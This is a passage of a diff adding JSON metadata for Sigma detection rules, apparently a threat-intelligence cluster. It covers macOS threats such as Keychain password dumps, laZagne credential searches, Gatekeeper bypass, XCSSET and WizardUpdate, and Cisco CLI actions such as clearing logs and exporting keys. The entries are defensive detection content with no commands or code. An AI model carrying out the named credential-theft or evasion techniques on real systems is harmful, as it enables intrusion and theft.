"tags": [ + "attack.t1136.001", + "attack.persistence" + ] + }, + "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", + "value": "Creation Of A Local User Account" + }, + { + "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_create_hidden_account.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", + "value": "Hidden User Creation" + }, + { + "description": "Detects passwords dumps from Keychain", + "meta": { + "author": "Tim Ismilyaev, oscd.community, Florian Roth", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_creds_from_keychain.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", + "https://gist.github.com/Capybara/6228955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.001" + ] + }, + "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", + "value": "Credentials from Password Stores - Keychain" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_disable_security_tools.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", + "value": "Disable Security Tools" + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_file_and_directory_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", + "value": "File and Directory Discovery - MacOS" + }, + { + "description": "Detecting attempts to extract passwords with grep and laZagne", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_find_cred_in_files.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", + "value": "Credentials In Files" + }, + { + "description": "Detects attempts to use system dialog prompts to capture user credentials", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate administration tools and activities" + ], + "filename": "proc_creation_macos_gui_input_capture.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", + "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1056.002" + ] + }, + "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", + "value": "GUI Input Capture - macOS" + }, + { + "description": "Detects enumeration of local systeam accounts on MacOS", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_local_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", + "value": "Local System Accounts Discovery - MacOs" + }, + { + "description": "Detects enumeration of local system groups", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_local_groups.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", + "value": "Local Groups Discovery - MacOs" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_network_service_scanning.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", + "value": "MacOS Network Service Scanning" + }, + { + "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_network_sniffing.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", + "value": "Network Sniffing - MacOs" + }, + { + "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" + ], + "tags": [ + "attack.t1059", + "attack.t1204", + "attack.execution", + "attack.t1140", + "attack.defense_evasion", + "attack.s0482", + "attack.s0402" + ] + }, + "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", + "value": "Payload Decoded and Decrypted via Built-in Utilities" + }, + { + "description": "Detects the enumeration of other remote systems.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_remote_system_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", + "value": "Macos Remote System Discovery" + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_schedule_task_job_cron.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ] + }, + "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", + "value": "Scheduled Cron Task/Job - MacOs" + }, + { + "description": "Detects attempts to use screencapture to collect macOS screenshots", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate user activity taking screenshots" + ], + "filename": "proc_creation_macos_screencapture.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", + "value": "Screen Capture - macOS" + }, + { + "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_security_software_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", + "value": "Security Software Discovery - MacOs" + }, + { + "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", + "meta": { + "author": "remotephone", + "creation_date": "2021/11/20", + "falsepositive": [ + "Mistyped commands or legitimate binaries named to match the pattern" + ], + "filename": "proc_creation_macos_space_after_filename.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.006" + ] + }, + "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", + "value": "Space After Filename - macOS" + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "proc_creation_macos_split_file_into_pieces.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ] + }, + "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", + "value": "Split A File Into Pieces" + }, + { + "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", + "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.002", + "attack.initial_access", + "attack.t1059", + "attack.t1059.002", + "attack.t1204", + "attack.t1204.001", + "attack.execution", + "attack.persistence", + "attack.t1553", + "attack.defense_evasion" + ] + }, + "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", + "value": "Suspicious Execution via macOS Script Editor" + }, + { + "description": "Detects commandline operations on shell history files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "filename": "proc_creation_macos_susp_histfile_operations.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "508a9374-ad52-4789-b568-fc358def2c65", + "value": "Suspicious History File Operations" + }, + { + "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", + "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", + "value": "Suspicious MacOS Firmware Activity" + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_system_network_connections_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", + "value": "System Network Connections Discovery - MacOs" + }, + { + "description": "Detects enumeration of local network configuration", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_system_network_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", + "value": "System Network Discovery - macOS" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "proc_creation_macos_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", + "value": "System Shutdown/Reboot - MacOs" + }, + { + "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", + "value": "Potential WizardUpdate Malware Infection" + }, + { + "description": "Detects macOS Gatekeeper bypass via xattr utility", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.001" + ] + }, + "uuid": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", + "value": "Gatekeeper Bypass via Xattr" + }, + { + "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_xcsset_malware_infection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", + "value": "Potential XCSSET Malware Infection" + }, + { + "description": "Clear command history in network OS which is used for defense evasion", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "filename": "cisco_cli_clear_logs.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", + "value": "Cisco Clear Logs" + }, + { + "description": "Collect pertinent data from the configuration files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Commonly run by administrators" + ], + "filename": "cisco_cli_collect_data.yml", + "level": "low", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.collection", + "attack.t1087.001", + "attack.t1552.001", + "attack.t1005" + ] + }, + "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", + "value": "Cisco Collect Data" + }, + { + "description": "Show when private keys are being exported from the device, or when new certificates are installed", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Not commonly run by administrators. Also whitelist your known good certificates" + ], + "filename": "cisco_cli_crypto_actions.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1553.004", + "attack.t1552.004" + ] + }, + "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", + "value": "Cisco Crypto Commands" + }, + { + "description": "Turn off logging locally or remote", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "cisco_cli_disable_logging.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", + "value": "Cisco Disabling Logging" + }, + { + "description": "Find information about network devices that is not stored in config files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Commonly used by administrators for troubleshooting" + ], + "filename": "cisco_cli_discovery.yml", + "level": "low", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083", + "attack.t1201", + "attack.t1057", + "attack.t1018", + "attack.t1082", + "attack.t1016", + "attack.t1049", + "attack.t1033", + "attack.t1124" + ] + }, + "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", + "value": "Cisco Discovery" + }, + { + "description": "Detect a system being shutdown or put into different boot mode", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/15", + "falsepositive": [ + "Legitimate administrators may run these commands, though rarely." + ], + "filename": "cisco_cli_dos.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" + ], + "tags": [ + "attack.impact", + "attack.t1495", + "attack.t1529", + "attack.t1565.001" + ] + }, + "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", + "value": "Cisco Denial of Service" + }, + { + "description": "See what files are being deleted from flash file systems", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Will be used sometimes by admins to clean up local flash space" + ], + "filename": "cisco_cli_file_deletion.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070.004", + "attack.t1561.001", + "attack.t1561.002" + ] + }, + "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", + "value": "Cisco File Deletion" + }, + { + "description": "See what commands are being input into the device by other people, full credentials can be in the history", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Not commonly run by administrators, especially if remote logging is configured" + ], + "filename": "cisco_cli_input_capture.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", + "value": "Cisco Show Commands Input" + }, + { + "description": "Find local accounts being created or modified as well as remote authentication configurations", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "When remote authentication is in place, this should not change often" + ], + "filename": "cisco_cli_local_accounts.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1098" + ] + }, + "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", + "value": "Cisco Local Accounts" + }, + { + "description": "Modifications to a config that will serve an adversary's impacts or persistence", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "filename": "cisco_cli_modify_config.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.impact", + "attack.t1490", + "attack.t1505", + "attack.t1565.002", + "attack.t1053" + ] + }, + "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", + "value": "Cisco Modify Configuration" + }, + { + "description": "Various protocols maybe used to put data on the device for exfil or infil", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Generally used to copy configs or IOS images" + ], + "filename": "cisco_cli_moving_data.yml", + "level": "low", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" + ], + "tags": [ + "attack.collection", + "attack.lateral_movement", + "attack.command_and_control", + "attack.exfiltration", + "attack.t1074", + "attack.t1105", + "attack.t1560.001" + ] + }, + "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", + "value": "Cisco Stage Data" + }, + { + "description": "Show when a monitor or a span/rspan is setup or modified", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Admins may setup new or modify old spans, or use a monitor for troubleshooting" + ], + "filename": "cisco_cli_net_sniff.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", + "value": "Cisco Sniffing" + }, + { + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + 